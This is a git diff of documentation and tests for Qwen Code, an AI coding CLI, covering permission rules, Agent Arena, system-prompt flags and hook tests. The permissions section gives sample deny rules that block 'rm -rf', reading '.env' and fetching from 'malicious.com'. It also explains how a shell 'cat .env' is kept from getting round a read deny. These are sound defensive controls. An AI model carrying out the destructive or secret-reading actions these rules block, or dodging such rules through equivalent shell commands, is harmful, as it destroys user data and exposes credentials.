all scopes (user + project + system). | `undefined` | +| `permissions.ask` | array of strings | Rules for tool calls that always require user confirmation. Takes priority over `allow`. | `undefined` | +| `permissions.deny` | array of strings | Rules for blocked tool calls. Highest priority — overrides both `allow` and `ask`. 
| `undefined` | + +**Tool name aliases (any of these work in rules):** + +| Alias | Canonical tool | Notes | +| --------------------- | ------------------- | ------------------------- | +| `Bash`, `Shell` | `run_shell_command` | | +| `Read`, `ReadFile` | `read_file` | Meta-category — see below | +| `Edit`, `EditFile` | `edit` | Meta-category — see below | +| `Write`, `WriteFile` | `write_file` | | +| `Grep`, `SearchFiles` | `grep_search` | | +| `Glob`, `FindFiles` | `glob` | | +| `ListFiles` | `list_directory` | | +| `WebFetch` | `web_fetch` | | +| `Agent` | `task` | | +| `Skill` | `skill` | | + +**Meta-categories:** + +Some rule names automatically cover multiple tools: + +| Rule name | Tools covered | +| --------- | ---------------------------------------------------- | +| `Read` | `read_file`, `grep_search`, `glob`, `list_directory` | +| `Edit` | `edit`, `write_file` | + +> [!important] +> `Read(/path/**)` matches **all four** read tools (file read, grep, glob, and directory listing). +> To restrict only file reading, use `ReadFile(/path/**)` or `read_file(/path/**)`. 
+ +**Rule syntax examples:** + +| Rule | Meaning | +| ----------------------------- | -------------------------------------------------------------- | +| `"Bash"` | All shell commands | +| `"Bash(git *)"` | Shell commands starting with `git` (word boundary: NOT `gitk`) | +| `"Bash(git push *)"` | Shell commands like `git push origin main` | +| `"Bash(npm run *)"` | Any `npm run` script | +| `"Read"` | All file read operations (read, grep, glob, list) | +| `"Read(./secrets/**)"` | Read any file under `./secrets/` recursively | +| `"Edit(/src/**/*.ts)"` | Edit TypeScript files under project root `/src/` | +| `"WebFetch(api.example.com)"` | Fetch from `api.example.com` and all its subdomains | +| `"mcp__puppeteer"` | All tools from the puppeteer MCP server | + +**Path pattern prefixes:** + +| Prefix | Meaning | Example | +| ------ | ------------------------------------- | ------------------- | +| `//` | Absolute path from filesystem root | `//etc/passwd` | +| `~/` | Relative to home directory | `~/Documents/*.pdf` | +| `/` | Relative to project root | `/src/**/*.ts` | +| `./` | Relative to current working directory | `./secrets/**` | +| (none) | Same as `./` | `secrets/**` | + +**Shell command bypass prevention:** + +Permission rules for `Read`, `Edit`, and `WebFetch` are also enforced when the agent runs equivalent shell commands. For example, if `Read(./.env)` is in `deny`, the agent cannot bypass it via `cat .env` in a shell command. Supported shell commands include `cat`, `grep`, `curl`, `wget`, `cp`, `mv`, `rm`, `chmod`, and many more. Unknown/safe commands (e.g. `git`) are unaffected by file/network rules. 
+ +**Migrating from legacy settings:** + +| Legacy setting | Equivalent `permissions` rule | Notes | +| --------------- | ------------------------------- | ------------------------------------------------------------ | +| `tools.allowed` | `permissions.allow` | Auto-migrated on first load | +| `tools.exclude` | `permissions.deny` | Auto-migrated on first load | +| `tools.core` | `permissions.allow` (allowlist) | Auto-migrated; unlisted tools are disabled at registry level | + +**Example configuration:** + +```json +{ + "permissions": { + "allow": ["Bash(git *)", "Bash(npm run *)", "Read(//Users/alice/code/**)"], + "ask": ["Bash(git push *)", "Edit"], + "deny": ["Bash(rm -rf *)", "Read(.env)", "WebFetch(malicious.com)"] + } +} +``` + +> [!tip] +> Use `/permissions` in the interactive CLI to view, add, and remove rules without editing `settings.json` directly. + #### mcp | Setting | Type | Description | Default | @@ -350,11 +445,6 @@ Here is an example of a `settings.json` file with the nested structure, new as o "maxSessionTurns": 10, "enableOpenAILogging": false, "openAILoggingDir": "~/qwen-logs", - "summarizeToolOutput": { - "run_shell_command": { - "tokenBudget": 100 - } - } }, "context": { "fileName": ["CONTEXT.md", "QWEN.md"], @@ -419,6 +509,8 @@ Arguments passed directly when running the CLI can override other configurations | `--model` | `-m` | Specifies the Qwen model to use for this session. | Model name | Example: `npm start -- --model qwen3-coder-plus` | | `--prompt` | `-p` | Used to pass a prompt directly to the command. This invokes Qwen Code in a non-interactive mode. | Your prompt text | For scripting examples, use the `--output-format json` flag to get structured output. | | `--prompt-interactive` | `-i` | Starts an interactive session with the provided prompt as the initial input. | Your prompt text | The prompt is processed within the interactive session, not before it. Cannot be used when piping input from stdin. 
Example: `qwen -i "explain this code"` | +| `--system-prompt` | | Overrides the built-in main session system prompt for this run. | Your prompt text | Loaded context files such as `QWEN.md` are still appended after this override. Can be combined with `--append-system-prompt`. | +| `--append-system-prompt` | | Appends extra instructions to the main session system prompt for this run. | Your prompt text | Applied after the built-in prompt and loaded context files. Can be combined with `--system-prompt`. See [Headless Mode](../features/headless) for examples. | | `--output-format` | `-o` | Specifies the format of the CLI output for non-interactive mode. | `text`, `json`, `stream-json` | `text`: (Default) The standard human-readable output. `json`: A machine-readable JSON output emitted at the end of execution. `stream-json`: Streaming JSON messages emitted as they occur during execution. For structured output and scripting, use the `--output-format json` or `--output-format stream-json` flag. See [Headless Mode](../features/headless) for detailed information. | | `--input-format` | | Specifies the format consumed from standard input. | `text`, `stream-json` | `text`: (Default) Standard text input from stdin or command-line arguments. `stream-json`: JSON message protocol via stdin for bidirectional communication. Requirement: `--input-format stream-json` requires `--output-format stream-json` to be set. When using `stream-json`, stdin is reserved for protocol messages. See [Headless Mode](../features/headless) for detailed information. | | `--include-partial-messages` | | Include partial assistant messages when using `stream-json` output format. When enabled, emits stream events (message_start, content_block_delta, etc.) as they occur during streaming. | | Default: `false`. Requirement: Requires `--output-format stream-json` to be set. See [Headless Mode](../features/headless) for detailed information about stream events. 
| diff --git a/docs/users/features/_meta.ts b/docs/users/features/_meta.ts index f5218e85f..9cf6d403f 100644 --- a/docs/users/features/_meta.ts +++ b/docs/users/features/_meta.ts @@ -1,6 +1,7 @@ export default { commands: 'Commands', 'sub-agents': 'SubAgents', + arena: 'Agent Arena', skills: 'Skills', headless: 'Headless Mode', checkpointing: { diff --git a/docs/users/features/arena.md b/docs/users/features/arena.md new file mode 100644 index 000000000..7b53238c7 --- /dev/null +++ b/docs/users/features/arena.md @@ -0,0 +1,218 @@ +# Agent Arena + +> Dispatch multiple AI models simultaneously to execute the same task, compare their solutions side-by-side, and select the best result to apply to your workspace. + +> [!warning] +> Agent Arena is experimental. It has [known limitations](#limitations) around display modes and session management. + +Agent Arena lets you pit multiple AI models against each other on the same task. Each model runs as a fully independent agent in its own isolated Git worktree, so file operations never interfere. When all agents finish, you compare results and select a winner to merge back into your main workspace. + +Unlike [subagents](/users/features/sub-agents), which delegate focused subtasks within a single session, Arena agents are complete, top-level agent instances — each with its own model, context window, and full tool access. + +This page covers: + +- [When to use Agent Arena](#when-to-use-agent-arena) +- [Starting an arena session](#start-an-arena-session) +- [Interacting with agents](#interact-with-agents), including display modes and navigation +- [Comparing results and selecting a winner](#compare-results-and-select-a-winner) +- [Best practices](#best-practices) + +## When to use Agent Arena + +Agent Arena is most effective when you want to **evaluate or compare** how different models tackle the same problem. 
The strongest use cases are: + +- **Model benchmarking**: Evaluate different models' capabilities on real tasks in your actual codebase, not synthetic benchmarks +- **Best-of-N selection**: Get multiple independent solutions and pick the best implementation +- **Exploring approaches**: See how different models reason about and solve the same problem — useful for learning and insight +- **Risk reduction**: For critical changes, validate that multiple models converge on a similar approach before committing + +Agent Arena uses significantly more tokens than a single session (each agent has its own context window and model calls). It works best when the value of comparison justifies the cost. For routine tasks where you trust your default model, a single session is more efficient. + +## Start an arena session + +Use the `/arena` slash command to launch a session. Specify the models you want to compete and the task: + +``` +/arena --models qwen3.5-plus,glm-5,kimi-k2.5 "Refactor the authentication module to use JWT tokens" +``` + +If you omit `--models`, an interactive model selection dialog appears, letting you pick from your configured providers. + +### What happens when you start + +1. **Worktree setup**: Qwen Code creates isolated Git worktrees for each agent at `~/.qwen/arena//worktrees//`. Each worktree mirrors your current working directory state exactly — including staged changes, unstaged changes, and untracked files. +2. **Agent spawning**: Each agent starts in its own worktree with full tool access and its configured model. Agents are launched sequentially but execute in parallel. +3. **Execution**: All agents work on the task independently with no shared state or communication. You can monitor their progress and interact with any of them. +4. **Completion**: When all agents finish (or fail), you enter the result comparison phase. 
+ +## Interact with agents + +### Display modes + +Agent Arena currently supports **in-process mode**, where all agents run asynchronously within the same terminal process. A tab bar at the bottom of the terminal lets you switch between agents. + +> [!note] +> **Split-pane display modes are planned for the future.** We intend to support tmux-based and iTerm2-based split-pane layouts, where each agent gets its own terminal pane for true side-by-side viewing. Currently, only in-process tab switching is available. + +### Navigate between agents + +In in-process mode, use keyboard shortcuts to switch between agent views: + +| Shortcut | Action | +| :------- | :-------------------------------- | +| `Right` | Switch to the next agent tab | +| `Left` | Switch to the previous agent tab | +| `Up` | Switch focus to the input box | +| `Down` | Switch focus to the agent tab bar | + +The tab bar shows each agent's current status: + +| Indicator | Meaning | +| :-------- | :--------------------- | +| `●` | Running or idle | +| `✓` | Completed successfully | +| `✗` | Failed | +| `○` | Cancelled | + +### Interact with individual agents + +When viewing an agent's tab, you can: + +- **Send messages** — type in the input area to give the agent additional instructions +- **Approve tool calls** — if an agent requests tool approval, the confirmation dialog appears in its tab +- **View full history** — scroll through the agent's complete conversation, including model output, tool calls, and results + +Each agent is a full, independent session. Anything you can do with the main agent, you can do with an arena agent. + +## Compare results and select a winner + +When all agents complete, the Arena enters the result comparison phase. You'll see: + +- **Status summary**: Which agents succeeded, failed, or were cancelled +- **Execution metrics**: Duration, rounds of reasoning, token usage, and tool call counts for each agent + +A selection dialog presents the successful agents. 
Choose one to apply its changes to your main workspace, or discard all results. + +### What happens when you select a winner + +1. The winning agent's changes are extracted as a diff against the baseline +2. The diff is applied to your main working directory +3. All worktrees and temporary branches are cleaned up automatically + +If you want to inspect results before deciding, each agent's full conversation history is available via the tab bar while the selection dialog is active. + +## Configuration + +Arena behavior can be customized in [settings.json](/users/configuration/settings): + +```json +{ + "arena": { + "worktreeBaseDir": "~/.qwen/arena", + "maxRoundsPerAgent": 50, + "timeoutSeconds": 600 + } +} +``` + +| Setting | Description | Default | +| :------------------------ | :--------------------------------- | :-------------- | +| `arena.worktreeBaseDir` | Base directory for arena worktrees | `~/.qwen/arena` | +| `arena.maxRoundsPerAgent` | Maximum reasoning rounds per agent | `50` | +| `arena.timeoutSeconds` | Timeout for each agent in seconds | `600` | + +## Best practices + +### Choose models that complement each other + +Arena is most valuable when you compare models with meaningfully different strengths. For example: + +``` +/arena --models qwen3.5-plus,glm-5,kimi-k2.5 "Optimize the database query layer" +``` + +Comparing three versions of the same model family yields less insight than comparing across providers. + +### Keep tasks self-contained + +Arena agents work independently with no communication. Tasks should be fully describable in the prompt without requiring back-and-forth: + +**Good**: "Refactor the payment module to use the strategy pattern. Update all tests." + +**Less effective**: "Let's discuss how to improve the payment module" — this benefits from conversation, which is better suited to a single session. + +### Limit the number of agents + +Up to 5 agents can run simultaneously. 
In practice, 2-3 agents provide the best balance of comparison value to resource cost. More agents means: + +- Higher token costs (each agent has its own context window) +- Longer total execution time +- More results to compare + +Start with 2-3 and scale up only when the comparison value justifies it. + +### Use Arena for high-impact decisions + +Arena shines when the stakes justify running multiple models: + +- Choosing an architecture for a new module +- Selecting an approach for a complex refactor +- Validating a critical bug fix from multiple angles + +For routine changes like renaming a variable or updating a config file, a single session is faster and cheaper. + +## Troubleshooting + +### Agents failing to start + +- Verify that each model in `--models` is properly configured with valid API credentials +- Check that your working directory is a Git repository (worktrees require Git) +- Ensure you have write access to the worktree base directory (`~/.qwen/arena/` by default) + +### Worktree creation fails + +- Run `git worktree list` to check for stale worktrees from previous sessions +- Clean up stale worktrees with `git worktree prune` +- Ensure your Git version supports worktrees (`git --version`, requires Git 2.5+) + +### Agent takes too long + +- Increase the timeout: set `arena.timeoutSeconds` in settings +- Reduce task complexity — Arena tasks should be focused and well-defined +- Lower `arena.maxRoundsPerAgent` if agents are spending too many rounds + +### Applying winner fails + +- Check for uncommitted changes in your main working directory that might conflict +- The diff is applied as a patch — merge conflicts are possible if your working directory changed during the session + +## Limitations + +Agent Arena is experimental. Current limitations: + +- **In-process mode only**: Split-pane display via tmux or iTerm2 is not yet available. All agents run within a single terminal window with tab switching. 
+- **No diff preview before selection**: You can view each agent's conversation history, but there is no unified diff viewer to compare solutions side-by-side before picking a winner. +- **No worktree retention**: Worktrees are always cleaned up after selection. There is no option to preserve them for further inspection. +- **No session resumption**: Arena sessions cannot be resumed after exiting. If you close the terminal mid-session, worktrees remain on disk and must be cleaned up manually via `git worktree prune`. +- **Maximum 5 agents**: The hard limit of 5 concurrent agents cannot be changed. +- **Git repository required**: Arena requires a Git repository for worktree isolation. It cannot be used in non-Git directories. + +## Comparison with other multi-agent modes + +Agent Arena is one of several planned multi-agent modes in Qwen Code. **Agent Team** and **Agent Swarm** are not yet implemented — the table below describes their intended design for reference. + +| | **Agent Arena** | **Agent Team** (planned) | **Agent Swarm** (planned) | +| :---------------- | :----------------------------------------------------- | :------------------------------------------------- | :------------------------------------------------------- | +| **Goal** | Competitive: Find the best solution to the _same_ task | Collaborative: Tackle _different_ aspects together | Batch parallel: Dynamically spawn workers for bulk tasks | +| **Agents** | Pre-configured models compete independently | Teammates collaborate with assigned roles | Workers spawned on-the-fly, destroyed on completion | +| **Communication** | No inter-agent communication | Direct peer-to-peer messaging | One-way: results aggregated by parent | +| **Isolation** | Full: separate Git worktrees | Independent sessions with shared task list | Lightweight ephemeral context per worker | +| **Output** | One selected solution applied to workspace | Synthesized results from multiple perspectives | Aggregated results from parallel 
processing | +| **Best for** | Benchmarking, choosing between model approaches | Research, complex collaboration, cross-layer work | Batch operations, data processing, map-reduce tasks | + +## Next steps + +Explore related approaches for parallel and delegated work: + +- **Lightweight delegation**: [Subagents](/users/features/sub-agents) handle focused subtasks within your session — better when you don't need model comparison +- **Manual parallel sessions**: Run multiple Qwen Code sessions yourself in separate terminals with [Git worktrees](https://git-scm.com/docs/git-worktree) for full manual control diff --git a/docs/users/features/commands.md b/docs/users/features/commands.md index ba980db80..faa3ec323 100644 --- a/docs/users/features/commands.md +++ b/docs/users/features/commands.md @@ -33,6 +33,7 @@ Commands for adjusting interface appearance and work environment. | Command | Description | Usage Examples | | ------------ | ---------------------------------------- | ----------------------------- | | `/clear` | Clear terminal screen content | `/clear` (shortcut: `Ctrl+L`) | +| `/context` | Show context window usage breakdown | `/context` | | `/theme` | Change Qwen Code visual theme | `/theme` | | `/vim` | Turn input area Vim editing mode on/off | `/vim` | | `/directory` | Manage multi-directory support workspace | `/dir add ./src,./tests` | @@ -94,6 +95,22 @@ Commands for obtaining information and performing system settings. 
| `Ctrl/cmd+Z` | Undo input | Text editing | | `Ctrl/cmd+Shift+Z` | Redo input | Text editing | +### 1.7 CLI Auth Subcommands + +In addition to the in-session `/auth` slash command, Qwen Code provides standalone CLI subcommands for managing authentication directly from the terminal: + +| Command | Description | +| ---------------------------------------------------- | ------------------------------------------------- | +| `qwen auth` | Interactive authentication setup | +| `qwen auth qwen-oauth` | Authenticate with Qwen OAuth | +| `qwen auth coding-plan` | Authenticate with Alibaba Cloud Coding Plan | +| `qwen auth coding-plan --region china --key sk-sp-…` | Non-interactive Coding Plan setup (for scripting) | +| `qwen auth status` | Show current authentication status | + +> [!tip] +> +> These commands run outside of a Qwen Code session. Use them to configure authentication before starting a session, or in scripts and CI environments. See the [Authentication](../configuration/auth) page for full details. + ## 2. @ Commands (Introducing Files) @ commands are used to quickly add local file or directory content to the conversation. diff --git a/docs/users/features/headless.md b/docs/users/features/headless.md index 203e08a2d..12172f121 100644 --- a/docs/users/features/headless.md +++ b/docs/users/features/headless.md @@ -58,6 +58,40 @@ qwen --resume 123e4567-e89b-12d3-a456-426614174000 -p "Apply the follow-up refac > - Session data is project-scoped JSONL under `~/.qwen/projects//chats`. > - Restores conversation history, tool outputs, and chat-compression checkpoints before sending the new prompt. +## Customize the Main Session Prompt + +You can change the main session system prompt for a single CLI run without editing shared memory files. + +### Override the Built-in System Prompt + +Use `--system-prompt` to replace Qwen Code's built-in main-session prompt for the current run: + +```bash +qwen -p "Review this patch" --system-prompt "You are a terse release reviewer. 
Report only blocking issues." +``` + +### Append Extra Instructions + +Use `--append-system-prompt` to keep the built-in prompt and add extra instructions for this run: + +```bash +qwen -p "Review this patch" --append-system-prompt "Be terse and focus on concrete findings." +``` + +You can combine both flags when you want a custom base prompt plus an extra run-specific instruction: + +```bash +qwen -p "Summarize this repository" \ + --system-prompt "You are a migration planner." \ + --append-system-prompt "Return exactly three bullets." +``` + +> [!note] +> +> - `--system-prompt` applies only to the current run's main session. +> - Loaded memory and context files such as `QWEN.md` are still appended after `--system-prompt`. +> - `--append-system-prompt` is applied after the built-in prompt and loaded memory, and can be used together with `--system-prompt`. + ## Output Formats Qwen Code supports multiple output formats for different use cases: @@ -189,19 +223,21 @@ qwen -p "Write code" --output-format stream-json --include-partial-messages | jq Key command-line options for headless usage: -| Option | Description | Example | -| ---------------------------- | --------------------------------------------------- | ------------------------------------------------------------------------ | -| `--prompt`, `-p` | Run in headless mode | `qwen -p "query"` | -| `--output-format`, `-o` | Specify output format (text, json, stream-json) | `qwen -p "query" --output-format json` | -| `--input-format` | Specify input format (text, stream-json) | `qwen --input-format text --output-format stream-json` | -| `--include-partial-messages` | Include partial messages in stream-json output | `qwen -p "query" --output-format stream-json --include-partial-messages` | -| `--debug`, `-d` | Enable debug mode | `qwen -p "query" --debug` | -| `--all-files`, `-a` | Include all files in context | `qwen -p "query" --all-files` | -| `--include-directories` | Include additional directories | `qwen -p 
"query" --include-directories src,docs` | -| `--yolo`, `-y` | Auto-approve all actions | `qwen -p "query" --yolo` | -| `--approval-mode` | Set approval mode | `qwen -p "query" --approval-mode auto_edit` | -| `--continue` | Resume the most recent session for this project | `qwen --continue -p "Pick up where we left off"` | -| `--resume [sessionId]` | Resume a specific session (or choose interactively) | `qwen --resume 123e... -p "Finish the refactor"` | +| Option | Description | Example | +| ---------------------------- | ------------------------------------------------------------------------ | ------------------------------------------------------------------------ | +| `--prompt`, `-p` | Run in headless mode | `qwen -p "query"` | +| `--output-format`, `-o` | Specify output format (text, json, stream-json) | `qwen -p "query" --output-format json` | +| `--input-format` | Specify input format (text, stream-json) | `qwen --input-format text --output-format stream-json` | +| `--include-partial-messages` | Include partial messages in stream-json output | `qwen -p "query" --output-format stream-json --include-partial-messages` | +| `--system-prompt` | Override the main session system prompt for this run | `qwen -p "query" --system-prompt "You are a terse reviewer."` | +| `--append-system-prompt` | Append extra instructions to the main session system prompt for this run | `qwen -p "query" --append-system-prompt "Focus on concrete findings."` | +| `--debug`, `-d` | Enable debug mode | `qwen -p "query" --debug` | +| `--all-files`, `-a` | Include all files in context | `qwen -p "query" --all-files` | +| `--include-directories` | Include additional directories | `qwen -p "query" --include-directories src,docs` | +| `--yolo`, `-y` | Auto-approve all actions | `qwen -p "query" --yolo` | +| `--approval-mode` | Set approval mode | `qwen -p "query" --approval-mode auto_edit` | +| `--continue` | Resume the most recent session for this project | `qwen --continue -p "Pick up where 
we left off"` | +| `--resume [sessionId]` | Resume a specific session (or choose interactively) | `qwen --resume 123e... -p "Finish the refactor"` | For complete details on all available configuration options, settings files, and environment variables, see the [Configuration Guide](../configuration/settings). diff --git a/docs/users/features/sandbox.md b/docs/users/features/sandbox.md index 72005f959..ba5e477e0 100644 --- a/docs/users/features/sandbox.md +++ b/docs/users/features/sandbox.md @@ -181,6 +181,29 @@ export SANDBOX_SET_UID_GID=false # Disable UID/GID mapping - Container sandbox: add them via `.qwen/sandbox.Dockerfile` or `.qwen/sandbox.bashrc`. - Seatbelt: your host binaries are used, but the sandbox may restrict access to some paths. +**Java not available in Docker sandbox** + +The official Qwen Code Docker image is intentionally minimal to keep the image small, secure, and fast to pull. Different users require different language runtimes (Java, Python, Node.js, etc.), and bundling all environments into a single image is not practical. Therefore, Java is **not included by default** in the Docker sandbox. + +If your workflow requires Java, you can extend the base image by creating a `.qwen/sandbox.Dockerfile` in your project: + +```dockerfile +FROM ghcr.io/qwenlm/qwen-code:latest + +RUN apt-get update && \ + apt-get install -y openjdk-17-jre && \ + apt-get clean && \ + rm -rf /var/lib/apt/lists/* +``` + +Then rebuild the sandbox image: + +```bash +QWEN_SANDBOX=docker BUILD_SANDBOX=1 qwen -s +``` + +For more details on customizing the sandbox, see [Customizing the sandbox environment](/developers/tools/sandbox). + **Network issues** - Check sandbox profile allows network. 
diff --git a/docs/users/features/sub-agents.md b/docs/users/features/sub-agents.md index 85ca4aff9..256034e3c 100644 --- a/docs/users/features/sub-agents.md +++ b/docs/users/features/sub-agents.md @@ -502,3 +502,10 @@ Always follow these standards: - **Access Control**: Project and user-level separation provides appropriate boundaries - **Sensitive Information**: Avoid including secrets or credentials in agent configurations - **Production Environments**: Consider separate agents for production vs development environments + +## Limits + +The following soft warnings apply to Subagent configurations (no hard limits are enforced): + +- **Description Field**: A warning is shown for descriptions exceeding 1,000 characters +- **System Prompt**: A warning is shown for system prompts exceeding 10,000 characters diff --git a/docs/users/integration-jetbrains.md b/docs/users/integration-jetbrains.md index 3f4739eab..baced8149 100644 --- a/docs/users/integration-jetbrains.md +++ b/docs/users/integration-jetbrains.md @@ -16,6 +16,30 @@ ### Installation +#### Install from ACP Registry (Recommended) + +1. Install Qwen Code CLI: + + ```bash + npm install -g @qwen-code/qwen-code + ``` + +2. Open your JetBrains IDE and navigate to the AI Chat tool window. + +3. Click **Add ACP Agent**, then click **Install**. + + ![Install](https://img.alicdn.com/imgextra/i4/O1CN01qNdPCW1y8AcqxRgCy_!!6000000006533-2-tps-2490-1788.png) + + For users using JetBrains AI Assistant and/or other ACP agents, click **Install From ACP Registry** in the Agents List, then install Qwen Code ACP. + + ![Add from Agents List](https://img.alicdn.com/imgextra/i2/O1CN01ZyOugP26BOKzNgZXx_!!6000000007623-2-tps-479-523.png) + +4. The Qwen Code agent should now be available in the AI Assistant panel. + + ![Qwen Code in JetBrains AI Chat](https://img.alicdn.com/imgextra/i4/O1CN013kAVE41XVzbIZOxyv_!!6000000002930-2-tps-3188-2170.png) + +#### Manual Install (for older versions of JetBrains IDEs) + 1.
Install Qwen Code CLI: ```bash diff --git a/docs/users/integration-zed.md b/docs/users/integration-zed.md index 7379bf69b..003d31709 100644 --- a/docs/users/integration-zed.md +++ b/docs/users/integration-zed.md @@ -18,6 +18,24 @@ ### Installation +#### Install from ACP Registry (Recommended) + +1. Install Qwen Code CLI: + +```bash +npm install -g @qwen-code/qwen-code +``` + +2. Download and install [Zed Editor](https://zed.dev/) + +3. In Zed, click the **settings button** in the top right corner, select **"Add agent"**, choose **"Install from Registry"**, find **Qwen Code**, then click **Install**. + + ![ACP Registry](https://img.alicdn.com/imgextra/i4/O1CN0186ybL61EeG35fHFjy_!!6000000000376-2-tps-3056-1705.png) + + ![Qwen Code ACP Installed](https://img.alicdn.com/imgextra/i1/O1CN01OXHhoR1J8irAvjs8F_!!6000000000984-2-tps-1247-703.png) + +#### Manual Install + 1. Install Qwen Code CLI: ```bash diff --git a/docs/users/quickstart.md b/docs/users/quickstart.md index 3c4eafcea..4d9e561e4 100644 --- a/docs/users/quickstart.md +++ b/docs/users/quickstart.md @@ -54,7 +54,7 @@ brew install qwen-code ## Step 2: Log in to your account -Qwen Code requires an account to use. When you start an interactive session with the `qwen` command, you'll need to log in: +Qwen Code requires an account to use. When you start an interactive session with the `qwen` command, you'll be prompted to log in: ```bash # You'll be prompted to log in on first use @@ -74,7 +74,7 @@ Select `Qwen OAuth`, log in to your account and follow the prompts to confirm. O > [!tip] > -> If you need to log in again or switch accounts, use the `/auth` command within Qwen Code. +> You can also configure authentication directly from the terminal without starting a session by running `qwen auth`. Use `qwen auth status` to check your current configuration at any time. See the [Authentication](./configuration/auth) page for details.
## Step 3: Start your first session @@ -216,7 +216,9 @@ Here are the most important commands for daily use: | Command | What it does | Example | | --------------------- | ------------------------------------------------ | ----------------------------- | | `qwen` | start Qwen Code | `qwen` | -| `/auth` | Change authentication method | `/auth` | +| `/auth` | Change authentication method (in session) | `/auth` | +| `qwen auth` | Configure authentication from the terminal | `qwen auth` | +| `qwen auth status` | Check current authentication status | `qwen auth status` | | `/help` | Display help information for available commands | `/help` or `/?` | | `/compress` | Replace chat history with summary to save Tokens | `/compress` | | `/clear` | Clear terminal screen content | `/clear` (shortcut: `Ctrl+L`) | diff --git a/eslint.config.js b/eslint.config.js index d0963e876..7b54f58a8 100644 --- a/eslint.config.js +++ b/eslint.config.js @@ -59,6 +59,7 @@ export default tseslint.config( ...importPlugin.configs.typescript.rules, 'import/no-default-export': 'warn', 'import/no-unresolved': 'off', // Disable for now, can be noisy with monorepos/paths + 'import/namespace': 'off', // Disabled due to https://github.com/import-js/eslint-plugin-import/issues/2866 }, }, { diff --git a/integration-tests/fixtures/settings-migration/workspaces.json b/integration-tests/fixtures/settings-migration/workspaces.json index af7a48f84..bd9798009 100644 --- a/integration-tests/fixtures/settings-migration/workspaces.json +++ b/integration-tests/fixtures/settings-migration/workspaces.json @@ -43,7 +43,6 @@ "maxSessionTurns": 50, "preferredEditor": "vscode", "sandbox": false, - "summarizeToolOutput": true, "telemetry": { "enabled": false }, diff --git a/integration-tests/hook-integration/hooks.test.ts b/integration-tests/hook-integration/hooks.test.ts index e5c860d4b..affb1670d 100644 --- a/integration-tests/hook-integration/hooks.test.ts +++ b/integration-tests/hook-integration/hooks.test.ts @@ -7,12 
+7,17 @@ import { TestRig, validateModelOutput } from '../test-helper.js'; * Tests for complete hook system flow including: * - UserPromptSubmit hooks: Triggered before prompt is sent to LLM * - Stop hooks: Triggered when agent is about to stop + * - SessionStart hooks: Triggered when a new session starts (Startup, Resume, Clear, Compact) + * - SessionEnd hooks: Triggered when a session ends (Clear, Logout, PromptInputExit) + * - PreToolUse hooks: Triggered before tool execution + * - PostToolUse hooks: Triggered after successful tool execution + * - PostToolUseFailure hooks: Triggered after tool execution fails + * - SubagentStart hooks: Triggered when a subagent starts + * - SubagentStop hooks: Triggered when a subagent stops + * - Notification hooks: Triggered when notifications are sent + * - PermissionRequest hooks: Triggered when permission dialogs are displayed + * - PreCompact hooks: Triggered before conversation compaction * - * Test categories: - * - Single hook scenarios (allow, block, modify, context, etc.) 
- * - Multiple hooks scenarios (parallel, sequential, mixed) - * - Error handling (timeout, missing command, exit codes) - * - Combined hooks (multiple hook types in same session) */ describe('Hooks System Integration', () => { let rig: TestRig; @@ -54,7 +59,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -84,7 +88,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -120,7 +123,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -150,7 +152,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -198,7 +199,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -229,7 +229,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -257,7 +256,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -286,7 +284,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -313,7 +310,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -339,7 +335,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -372,7 +367,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -403,7 +397,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -442,7 +435,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -476,7 +468,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -517,7 +508,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -562,7 +552,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -601,7 +590,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -638,7 +626,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, 
}, }); @@ -673,7 +660,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -708,7 +694,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -750,7 +735,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -791,7 +775,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -829,7 +812,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -866,7 +848,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -903,7 +884,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -932,7 +912,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -967,7 +946,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1009,7 +987,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1052,7 +1029,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1089,7 +1065,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1098,37 +1073,6 @@ describe('Hooks System Integration', () => { }); }); - describe('Stop Reason', () => { - it('should include stop reason when hook provides it', async () => { - const reasonScript = - 'echo \'{"decision": "allow", "stopReason": "Custom stop reason from hook"}\''; - - await rig.setup('stop-set-reason', { - settings: { - hooksConfig: { enabled: true }, - hooks: { - Stop: [ - { - hooks: [ - { - type: 'command', - command: reasonScript, - name: 'stop-reason-hook', - timeout: 5000, - }, - ], - }, - ], - }, - trusted: true, - }, - }); - - const result = await rig.run('Say reason test'); - expect(result).toBeDefined(); - }); - }); - describe('Timeout Handling', () => { it('should continue stopping when hook times out', async () => { await rig.setup('stop-timeout', { 